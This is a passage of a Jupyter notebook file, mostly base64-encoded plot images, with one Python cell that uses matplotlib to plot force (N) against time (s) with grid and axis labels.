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\n",
"text/plain": [
"<matplotlib.figure.Figure at 0x7fc79c391be0>"
]
},
"metadata": {},
"output_type": "display_data"
}
],
"source": [
"fig, ax = plt.subplots(1, 1, figsize=(6,6), sharex=True)\n",
"\n",
"ax.plot(t,F,c='red')\n",
"plt.grid()\n",
"plt.xlabel('time (s)')\n",
"plt.ylabel('Force (N)')\n",
"\n",
"\n",
"ax.legend()"
]
},
{
"cell_type": "code",
"execution_count": 15,
"metadata": {
"scrolled": false
},
"outputs": [
{
"data": {
"text/plain": [
"<matplotlib.text.Text at 0x7fc79c1ef550>"
]
},
"execution_count": 15,
"metadata": {},
"output_type": "execute_result"
},
{
"data": {
"image/png": "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